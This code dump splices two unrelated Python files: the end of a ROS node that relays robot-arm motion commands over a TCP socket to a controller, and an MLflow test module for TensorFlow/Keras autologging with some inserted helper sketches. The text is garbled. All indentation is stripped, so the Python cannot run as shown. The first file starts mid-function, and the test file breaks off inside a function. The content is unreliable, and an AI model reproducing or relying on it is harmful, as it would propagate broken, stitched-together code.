socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ## receive arm speed mode data sent from the strategy side
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
return(1)
# def Grip_Mode(req): ## receive gripper action data sent from the strategy side
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ## create the server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## keep the node alive until shutdown
##------------server side end-------
##---------- socket packet transmission --------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data,point_data_flag,arm_mode_flag,speed_mode_flag,Socket_sent_flag
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
#start_input=int(input('Press 1 to start transmitting, 3 to quit: ')) # start command input
start_input = 1
if start_input==1:
while 1:
##--------------- send arm commands over the socket -----------------
#if Arm_feedback == 0:
if point_data_flag == True or arm_mode_flag == True or speed_mode_flag == True:
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
#------- select mode --------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#------- set arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#------- set arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#------- set arm fast & safe speed mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action = 5 ## reset to the initial mode state
s.send(data.encode('utf-8')) # send over the socket; encode str to bytes for transmission
Socket_sent_flag = True
socket_client_sent_flag(Socket_sent_flag)
feedback_str = s.recv(1024)
# the arm side reports its state
if str(feedback_str[2]) == '70':# 'F': the arm is Ready to receive the next motion command
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# 'T': the arm is busy and cannot execute the next motion command
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# '6': the strategy has finished
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
##--------------- send arm commands over the socket: end -----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##------------- socket packet transmission end --------------##
## multithreading
def thread_test():
socket_client()
## multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5 ## reset to the initial mode state
t = threading.Thread(target=thread_test)
t.start() # start the worker thread
socket_server()
t.join()
# Ctrl+K Ctrl+C  Add line comment
# Ctrl+K Ctrl+U  Remove line comment
# Ctrl+] / Ctrl+[  Indent / outdent line
|
test_tensorflow2_autolog.py
|
# pep8: disable=E501
import collections
import pytest
import sys
from packaging.version import Version
import numpy as np
import pandas as pd
import tensorflow as tf
from tensorflow.keras import layers
import mlflow
import mlflow.tensorflow
import mlflow.keras
from mlflow.utils.autologging_utils import BatchMetricsLogger, autologging_is_disabled
from unittest.mock import patch
import os
np.random.seed(1337)
SavedModelInfo = collections.namedtuple(
"SavedModelInfo",
["path", "meta_graph_tags", "signature_def_key", "inference_df", "expected_results_df"],
)
@pytest.fixture(autouse=True)
def clear_session():
yield
tf.keras.backend.clear_session()
@pytest.fixture
def random_train_data():
return np.random.random((150, 4))
@pytest.fixture
def random_one_hot_labels():
n, n_class = (150, 3)
classes = np.random.randint(0, n_class, n)
labels = np.zeros((n, n_class))
labels[np.arange(n), classes] = 1
return labels
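# --- editor's sketch (not part of the original test module): the fixture above one-hot encodes
# integer class ids with NumPy fancy indexing (labels[np.arange(n), classes] = 1). The helper
# below shows the same trick on a 4-sample / 3-class example.
def _sketch_one_hot(classes=(0, 2, 1, 2), n_class=3):
    classes = np.asarray(classes)
    one_hot = np.zeros((classes.size, n_class))
    one_hot[np.arange(classes.size), classes] = 1
    return one_hot  # [[1,0,0],[0,0,1],[0,1,0],[0,0,1]]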
@pytest.fixture
def clear_tf_keras_imports():
"""
Simulates a state where `tensorflow` and `keras` are not imported by removing these
libraries from the `sys.modules` dictionary. This is useful for testing the interaction
between TensorFlow / Keras and the fluent `mlflow.autolog()` API because it will cause import
hooks to be re-triggered upon re-import after `mlflow.autolog()` is enabled.
"""
sys.modules.pop("tensorflow", None)
sys.modules.pop("keras", None)
@pytest.fixture(autouse=True)
def clear_fluent_autologging_import_hooks():
"""
Clears import hooks for MLflow fluent autologging (`mlflow.autolog()`) between tests
to ensure that interactions between fluent autologging and TensorFlow / tf.keras can
be tested successfully
"""
mlflow.utils.import_hooks._post_import_hooks.pop("tensorflow", None)
mlflow.utils.import_hooks._post_import_hooks.pop("keras", None)
def create_tf_keras_model():
model = tf.keras.Sequential()
model.add(layers.Dense(16, activation="relu", input_shape=(4,)))
model.add(layers.Dense(3, activation="softmax"))
model.compile(
optimizer=tf.keras.optimizers.Adam(), loss="categorical_crossentropy", metrics=["accuracy"]
)
return model
@pytest.mark.large
def test_tf_keras_autolog_ends_auto_created_run(random_train_data, random_one_hot_labels):
mlflow.tensorflow.autolog()
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10)
assert mlflow.active_run() is None
@pytest.mark.large
@pytest.mark.parametrize("log_models", [True, False])
def test_tf_keras_autolog_log_models_configuration(
random_train_data, random_one_hot_labels, log_models
):
# pylint: disable=unused-argument
mlflow.tensorflow.autolog(log_models=log_models)
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10)
client = mlflow.tracking.MlflowClient()
run_id = client.list_run_infos(experiment_id="0")[0].run_id
artifacts = client.list_artifacts(run_id)
artifacts = map(lambda x: x.path, artifacts)
assert ("model" in artifacts) == log_models
@pytest.mark.large
def test_tf_keras_autolog_persists_manually_created_run(random_train_data, random_one_hot_labels):
mlflow.tensorflow.autolog()
with mlflow.start_run() as run:
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10)
assert mlflow.active_run()
assert mlflow.active_run().info.run_id == run.info.run_id
@pytest.fixture
def tf_keras_random_data_run(random_train_data, random_one_hot_labels, initial_epoch):
# pylint: disable=unused-argument
mlflow.tensorflow.autolog()
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
history = model.fit(
data, labels, epochs=initial_epoch + 10, steps_per_epoch=1, initial_epoch=initial_epoch
)
client = mlflow.tracking.MlflowClient()
return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id), history
@pytest.mark.large
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_logs_expected_data(tf_keras_random_data_run):
run, history = tf_keras_random_data_run
data = run.data
assert "accuracy" in data.metrics
assert "loss" in data.metrics
# Testing explicitly passed parameters are logged correctly
assert "epochs" in data.params
assert data.params["epochs"] == str(history.epoch[-1] + 1)
assert "steps_per_epoch" in data.params
assert data.params["steps_per_epoch"] == "1"
# Testing default parameters are logged correctly
assert "initial_epoch" in data.params
assert data.params["initial_epoch"] == str(history.epoch[0])
# Testing unwanted parameters are not logged
assert "callbacks" not in data.params
assert "validation_data" not in data.params
# Testing optimizer parameters are logged
assert "opt_name" in data.params
assert data.params["opt_name"] == "Adam"
assert "opt_learning_rate" in data.params
assert "opt_decay" in data.params
assert "opt_beta_1" in data.params
assert "opt_beta_2" in data.params
assert "opt_epsilon" in data.params
assert "opt_amsgrad" in data.params
assert data.params["opt_amsgrad"] == "False"
client = mlflow.tracking.MlflowClient()
all_epoch_acc = client.get_metric_history(run.info.run_id, "accuracy")
num_of_epochs = len(history.history["loss"])
assert len(all_epoch_acc) == num_of_epochs == 10
artifacts = client.list_artifacts(run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model_summary.txt" in artifacts
@pytest.mark.large
def test_tf_keras_autolog_records_metrics_for_last_epoch(random_train_data, random_one_hot_labels):
every_n_iter = 5
num_training_epochs = 17
mlflow.tensorflow.autolog(every_n_iter=every_n_iter)
model = create_tf_keras_model()
with mlflow.start_run() as run:
model.fit(
random_train_data, random_one_hot_labels, epochs=num_training_epochs, initial_epoch=0,
)
client = mlflow.tracking.MlflowClient()
run_metrics = client.get_run(run.info.run_id).data.metrics
assert "accuracy" in run_metrics
all_epoch_acc = client.get_metric_history(run.info.run_id, "accuracy")
assert set([metric.step for metric in all_epoch_acc]) == set([0, 5, 10, 15])
@pytest.mark.large
def test_tf_keras_autolog_logs_metrics_for_single_epoch_training(
random_train_data, random_one_hot_labels
):
"""
tf.Keras exhibits inconsistent epoch indexing behavior in comparison with other
TF2 APIs (e.g., tf.Estimator). tf.Keras uses zero-indexing for epochs,
while other APIs use one-indexing. Accordingly, this test verifies that metrics are
produced in the boundary case where a model is trained for a single epoch, ensuring
that we don't miss the zero index in the tf.Keras case.
"""
mlflow.tensorflow.autolog(every_n_iter=5)
model = create_tf_keras_model()
with mlflow.start_run() as run:
model.fit(
random_train_data, random_one_hot_labels, epochs=1,
)
client = mlflow.tracking.MlflowClient()
run_metrics = client.get_run(run.info.run_id).data.metrics
assert "accuracy" in run_metrics
assert "loss" in run_metrics
@pytest.mark.large
def test_tf_keras_autolog_names_positional_parameters_correctly(
random_train_data, random_one_hot_labels
):
mlflow.tensorflow.autolog(every_n_iter=5)
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
with mlflow.start_run():
# Pass `batch_size` as a positional argument for testing purposes
model.fit(data, labels, 8, epochs=10, steps_per_epoch=1)
run_id = mlflow.active_run().info.run_id
client = mlflow.tracking.MlflowClient()
run_info = client.get_run(run_id)
assert run_info.data.params.get("batch_size") == "8"
@pytest.mark.large
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_model_can_load_from_artifact(tf_keras_random_data_run, random_train_data):
run, _ = tf_keras_random_data_run
client = mlflow.tracking.MlflowClient()
artifacts = client.list_artifacts(run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
assert "tensorboard_logs" in artifacts
model = mlflow.keras.load_model("runs:/" + run.info.run_id + "/model")
model.predict(random_train_data)
def get_tf_keras_random_data_run_with_callback(
random_train_data, random_one_hot_labels, callback, restore_weights, patience, initial_epoch,
):
# pylint: disable=unused-argument
mlflow.tensorflow.autolog(every_n_iter=1)
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
if callback == "early":
# min_delta is set as such to guarantee early stopping
callback = tf.keras.callbacks.EarlyStopping(
monitor="loss",
patience=patience,
min_delta=99999999,
restore_best_weights=restore_weights,
verbose=1,
)
else:
class CustomCallback(tf.keras.callbacks.Callback):
def on_train_end(self, logs=None):
print("Training completed")
callback = CustomCallback()
history = model.fit(
data, labels, epochs=initial_epoch + 10, callbacks=[callback], initial_epoch=initial_epoch
)
client = mlflow.tracking.MlflowClient()
return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id), history, callback
@pytest.fixture
def tf_keras_random_data_run_with_callback(
random_train_data, random_one_hot_labels, callback, restore_weights, patience, initial_epoch,
):
return get_tf_keras_random_data_run_with_callback(
random_train_data,
random_one_hot_labels,
callback,
restore_weights,
patience,
initial_epoch,
)
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [0, 1, 5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_logs(tf_keras_random_data_run_with_callback, initial_epoch):
run, history, callback = tf_keras_random_data_run_with_callback
metrics = run.data.metrics
params = run.data.params
assert "patience" in params
assert params["patience"] == str(callback.patience)
assert "monitor" in params
assert params["monitor"] == "loss"
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" in metrics
assert "restored_epoch" in metrics
restored_epoch = int(metrics["restored_epoch"])
# In this test, the best epoch is always the first epoch because the early stopping callback
# never observes a loss improvement due to an extremely large `min_delta` value
assert restored_epoch == initial_epoch
assert "loss" in history.history
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check that MLflow has logged the metrics of the "best" model, in addition to per-epoch metrics
loss = history.history["loss"]
assert len(metric_history) == len(loss) + 1
steps, values = map(list, zip(*[(m.step, m.value) for m in metric_history]))
# Check that MLflow has logged the correct steps
assert steps == [*history.epoch, callback.stopped_epoch + 1]
# Check that MLflow has logged the correct metric values
np.testing.assert_allclose(values, [*loss, callback.best])
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [0, 1, 5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_batch_metrics_logger_logs_expected_metrics(
callback, restore_weights, patience, initial_epoch, random_train_data, random_one_hot_labels,
):
patched_metrics_data = []
# Mock patching BatchMetricsLogger.record_metrics()
# to ensure that expected metrics are being logged.
original = BatchMetricsLogger.record_metrics
with patch(
"mlflow.utils.autologging_utils.BatchMetricsLogger.record_metrics", autospec=True
) as record_metrics_mock:
def record_metrics_side_effect(self, metrics, step=None):
patched_metrics_data.extend(metrics.items())
original(self, metrics, step)
record_metrics_mock.side_effect = record_metrics_side_effect
run, _, callback = get_tf_keras_random_data_run_with_callback(
random_train_data,
random_one_hot_labels,
callback,
restore_weights,
patience,
initial_epoch,
)
patched_metrics_data = dict(patched_metrics_data)
original_metrics = run.data.metrics
for metric_name in original_metrics:
assert metric_name in patched_metrics_data
restored_epoch = int(patched_metrics_data["restored_epoch"])
assert restored_epoch == initial_epoch
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [11])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_no_stop_does_not_log(tf_keras_random_data_run_with_callback):
run, history, callback = tf_keras_random_data_run_with_callback
metrics = run.data.metrics
params = run.data.params
assert "patience" in params
assert params["patience"] == str(callback.patience)
assert "monitor" in params
assert params["monitor"] == "loss"
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" not in metrics
assert "restored_epoch" not in metrics
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == 10
assert len(metric_history) == num_of_epochs
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [False])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_no_restore_doesnt_log(tf_keras_random_data_run_with_callback):
run, history, callback = tf_keras_random_data_run_with_callback
metrics = run.data.metrics
params = run.data.params
assert "patience" in params
assert params["patience"] == str(callback.patience)
assert "monitor" in params
assert params["monitor"] == "loss"
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" in metrics
assert "restored_epoch" not in metrics
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == callback.patience + 1
assert len(metric_history) == num_of_epochs
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [False])
@pytest.mark.parametrize("callback", ["not-early"])
@pytest.mark.parametrize("patience", [5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_non_early_stop_callback_no_log(tf_keras_random_data_run_with_callback):
run, history = tf_keras_random_data_run_with_callback[:-1]
metrics = run.data.metrics
params = run.data.params
assert "patience" not in params
assert "monitor" not in params
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" not in metrics
assert "restored_epoch" not in metrics
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == 10
assert len(metric_history) == num_of_epochs
@pytest.mark.parametrize("positional", [True, False])
def test_tf_keras_autolog_does_not_mutate_original_callbacks_list(
tmpdir, random_train_data, random_one_hot_labels, positional
):
"""
TensorFlow autologging passes new callbacks to the `fit()` / `fit_generator()` function. If
preexisting user-defined callbacks already exist, these new callbacks are added to the
user-specified ones. This test verifies that the new callbacks are added to the without
permanently mutating the original list of callbacks.
"""
mlflow.tensorflow.autolog()
tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=tmpdir)
callbacks = [tensorboard_callback]
model = create_tf_keras_model()
data = random_train_data
labels = random_one_hot_labels
if positional:
model.fit(data, labels, None, 10, 1, callbacks)
else:
model.fit(data, labels, epochs=10, callbacks=callbacks)
assert len(callbacks) == 1
assert callbacks == [tensorboard_callback]
@pytest.mark.large
def test_tf_keras_autolog_does_not_delete_logging_directory_for_tensorboard_callback(
tmpdir, random_train_data, random_one_hot_labels
):
tensorboard_callback_logging_dir_path = str(tmpdir.mkdir("tb_logs"))
tensorboard_callback = tf.keras.callbacks.TensorBoard(
tensorboard_callback_logging_dir_path, histogram_freq=0
)
mlflow.tensorflow.autolog()
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10, callbacks=[tensorboard_callback])
assert os.path.exists(tensorboard_callback_logging_dir_path)
@pytest.mark.large
def test_tf_keras_autolog_logs_to_and_deletes_temporary_directory_when_tensorboard_callback_absent(
tmpdir, random_train_data, random_one_hot_labels
):
from unittest import mock
from mlflow.tensorflow import _TensorBoardLogDir
mlflow.tensorflow.autolog()
mock_log_dir_inst = _TensorBoardLogDir(location=str(tmpdir.mkdir("tb_logging")), is_temp=True)
with mock.patch("mlflow.tensorflow._TensorBoardLogDir", autospec=True) as mock_log_dir_class:
mock_log_dir_class.return_value = mock_log_dir_inst
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10)
assert not os.path.exists(mock_log_dir_inst.location)
def create_tf_estimator_model(directory, export, training_steps=100, use_v1_estimator=False):
CSV_COLUMN_NAMES = ["SepalLength", "SepalWidth", "PetalLength", "PetalWidth", "Species"]
train = pd.read_csv(
os.path.join(os.path.dirname(__file__), "iris_training.csv"),
names=CSV_COLUMN_NAMES,
header=0,
)
train_y = train.pop("Species")
def input_fn(features, labels, training=True, batch_size=256):
"""An input function for training or evaluating"""
# Convert the inputs to a Dataset.
dataset = tf.data.Dataset.from_tensor_slices((dict(features), labels))
# Shuffle and repeat if you are in training mode.
if training:
dataset = dataset.shuffle(1000).repeat()
return dataset.batch(batch_size)
my_feature_columns = []
for key in train.keys():
my_feature_columns.append(tf.feature_column.numeric_column(key=key))
feature_spec = {}
for feature in CSV_COLUMN_NAMES:
feature_spec[feature] = tf.Variable([], dtype=tf.float64, name=feature)
receiver_fn = tf.estimator.export.build_raw_serving_input_receiver_fn(feature_spec)
run_config = tf.estimator.RunConfig(
# Emit loss metrics to TensorBoard every step
save_summary_steps=1,
)
# If flag set to true, then use the v1 classifier that extends Estimator
# If flag set to false, then use the v2 classifier that extends EstimatorV2
if use_v1_estimator:
classifier = tf.compat.v1.estimator.DNNClassifier(
feature_columns=my_feature_columns,
# Two hidden layers of 10 nodes each.
hidden_units=[30, 10],
# The model must choose between 3 classes.
n_classes=3,
model_dir=directory,
config=run_config,
)
else:
classifier = tf.estimator.DNNClassifier(
feature_columns=my_feature_columns,
# Two hidden layers of 10 nodes each.
hidden_units=[30, 10],
# The model must choose between 3 classes.
n_classes=3,
model_dir=directory,
config=run_config,
)
classifier.train(input_fn=lambda: input_fn(train, train_y, training=True), steps=training_steps)
if export:
classifier.export_saved_model(directory, receiver_fn)
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_ends_auto_created_run(tmpdir, export):
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog()
create_tf_estimator_model(str(directory), export)
assert mlflow.active_run() is None
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_persists_manually_created_run(tmpdir, export):
directory = tmpdir.mkdir("test")
with mlflow.start_run() as run:
create_tf_estimator_model(str(directory), export)
assert mlflow.active_run()
assert mlflow.active_run().info.run_id == run.info.run_id
@pytest.fixture
def tf_estimator_random_data_run(tmpdir, export):
# pylint: disable=unused-argument
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog()
create_tf_estimator_model(str(directory), export)
client = mlflow.tracking.MlflowClient()
return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
@pytest.mark.parametrize("use_v1_estimator", [True, False])
def test_tf_estimator_autolog_logs_metrics(tmpdir, export, use_v1_estimator):
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog(every_n_iter=5)
with mlflow.start_run():
create_tf_estimator_model(
str(directory), export, use_v1_estimator=use_v1_estimator, training_steps=17
)
run_id = mlflow.active_run().info.run_id
client = mlflow.tracking.MlflowClient()
run = client.get_run(run_id)
assert "loss" in run.data.metrics
assert "steps" in run.data.params
metrics = client.get_metric_history(run_id, "loss")
assert set([metric.step for metric in metrics]) == set([1, 6, 11, 16])
@pytest.mark.large
@pytest.mark.parametrize("export", [True])
def test_tf_estimator_v1_autolog_can_load_from_artifact(tmpdir, export):
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog()
create_tf_estimator_model(str(directory), export, use_v1_estimator=True)
client = mlflow.tracking.MlflowClient()
tf_estimator_v1_run = client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)
artifacts = client.list_artifacts(tf_estimator_v1_run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
mlflow.tensorflow.load_model("runs:/" + tf_estimator_v1_run.info.run_id + "/model")
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_logs_tensorboard_logs(tf_estimator_random_data_run):
client = mlflow.tracking.MlflowClient()
artifacts = client.list_artifacts(tf_estimator_random_data_run.info.run_id)
assert any(["tensorboard_logs" in a.path and a.is_dir for a in artifacts])
@pytest.mark.large
def test_tf_estimator_autolog_logs_metrics_in_exclusive_mode(tmpdir):
mlflow.tensorflow.autolog(exclusive=True)
create_tf_estimator_model(tmpdir, export=False)
client = mlflow.tracking.MlflowClient()
tf_estimator_run = client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)
assert "loss" in tf_estimator_run.data.metrics
assert "steps" in tf_estimator_run.data.params
metrics = client.get_metric_history(tf_estimator_run.info.run_id, "loss")
assert len(metrics) == 100
@pytest.mark.large
def test_tf_estimator_autolog_logs_metics_for_single_epoch_training(tmpdir):
"""
Epoch indexing behavior is inconsistent across TensorFlow 2: tf.Keras uses
zero-indexing for epochs, while other APIs (e.g., tf.Estimator) use one-indexing.
This test verifies that metrics are produced for tf.Estimator training sessions
in the boundary case where a model is trained for a single epoch, ensuring that
we capture metrics from the first epoch at index 1.
"""
mlflow.tensorflow.autolog()
with mlflow.start_run() as run:
create_tf_estimator_model(str(tmpdir), export=False, training_steps=1)
client = mlflow.tracking.MlflowClient()
metrics = client.get_metric_history(run.info.run_id, "loss")
assert len(metrics) == 1
assert metrics[0].step == 1
@pytest.mark.large
@pytest.mark.parametrize("export", [True])
def test_tf_estimator_autolog_model_can_load_from_artifact(tf_estimator_random_data_run):
client = mlflow.tracking.MlflowClient()
artifacts = client.list_artifacts(tf_estimator_random_data_run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
mlflow.tensorflow.load_model("runs:/" + tf_estimator_random_data_run.info.run_id + "/model")
@pytest.mark.large
def test_flush_queue_is_thread_safe():
"""
Autologging augments TensorBoard event logging hooks with MLflow `log_metric` API
calls. To prevent these API calls from blocking TensorBoard event logs, `log_metric`
API calls are scheduled via `_flush_queue` on a background thread. Accordingly, this test
verifies that `_flush_queue` is thread safe.
"""
from threading import Thread
from mlflow.entities import Metric
from mlflow.tensorflow import _flush_queue, _metric_queue_lock
client = mlflow.tracking.MlflowClient()
run = client.create_run(experiment_id="0")
metric_queue_item = (run.info.run_id, Metric("foo", 0.1, 100, 1))
mlflow.tensorflow._metric_queue.append(metric_queue_item)
# Verify that, if another thread holds a lock on the metric queue leveraged by
# _flush_queue, _flush_queue terminates and does not modify the queue
_metric_queue_lock.acquire()
flush_thread1 = Thread(target=_flush_queue)
flush_thread1.start()
flush_thread1.join()
assert len(mlflow.tensorflow._metric_queue) == 1
assert mlflow.tensorflow._metric_queue[0] == metric_queue_item
_metric_queue_lock.release()
# Verify that, if no other thread holds a lock on the metric queue leveraged by
# _flush_queue, _flush_queue flushes the queue as expected
flush_thread2 = Thread(target=_flush_queue)
flush_thread2.start()
flush_thread2.join()
assert len(mlflow.tensorflow._metric_queue) == 0
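# --- editor's sketch (not part of the original test module): the test above relies on
# _flush_queue() skipping its work when another thread already holds the metric-queue lock.
# A generic "try-lock, flush, else skip" helper looks like the sketch below; the names are
# hypothetical and are not the mlflow internals.
def _sketch_try_flush(pending, lock, sink):
    if not lock.acquire(blocking=False):  # another thread is flushing: do nothing
        return False
    try:
        while pending:
            sink(pending.pop(0))
    finally:
        lock.release()
    return True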
def get_text_vec_model(train_samples):
# Taken from: https://github.com/mlflow/mlflow/issues/3910
# pylint: disable=no-name-in-module
from tensorflow.keras.layers.experimental.preprocessing import TextVectorization
VOCAB_SIZE = 10
SEQUENCE_LENGTH = 16
EMBEDDING_DIM = 16
vectorizer_layer = TextVectorization(
input_shape=(1,),
max_tokens=VOCAB_SIZE,
output_mode="int",
output_sequence_length=SEQUENCE_LENGTH,
)
vectorizer_layer.adapt(train_samples)
model = tf.keras.Sequential(
[
vectorizer_layer,
tf.keras.layers.Embedding(
VOCAB_SIZE, EMBEDDING_DIM, name="embedding", mask_zero=True, input_shape=(1,),
),
tf.keras.layers.GlobalAveragePooling1D(),
tf.keras.layers.Dense(16, activation="relu"),
tf.keras.layers.Dense(1, activation="tanh"),
]
)
model.compile(optimizer="adam", loss="mse", metrics="mae")
return model
@pytest.mark.skipif(
Version(tf.__version__) < Version("2.3.0"),
reason=(
"Deserializing a model with `TextVectorization` and `Embedding`"
"fails in tensorflow < 2.3.0. See this issue:"
"https://github.com/tensorflow/tensorflow/issues/38250"
),
)
def test_autolog_text_vec_model(tmpdir):
"""
Verifies autolog successfully saves a model that can't be saved in the H5 format
"""
mlflow.tensorflow.autolog()
train_samples = np.array(["this is an example", "another example"])
train_labels = np.array([0.4, 0.2])
model = get_text_vec_model(train_samples)
# Saving in the H5 format should fail
with pytest.raises(NotImplementedError, match="is not supported in h5"):
model.save(tmpdir.join("model.h5").strpath, save_format="h5")
with mlflow.start_run() as run:
model.fit(train_samples, train_labels, epochs=1)
loaded_model = mlflow.keras.load_model("runs:/" + run.info.run_id + "/model")
np.testing.assert_array_equal(loaded_model.predict(train_samples), model.predict(train_samples))
def test_fit_generator(random_train_data, random_one_hot_labels):
mlflow.tensorflow.autolog()
model = create_tf_keras_model()
def generator():
while True:
yield random_train_data, random_one_hot_labels
with mlflow.start_run() as run:
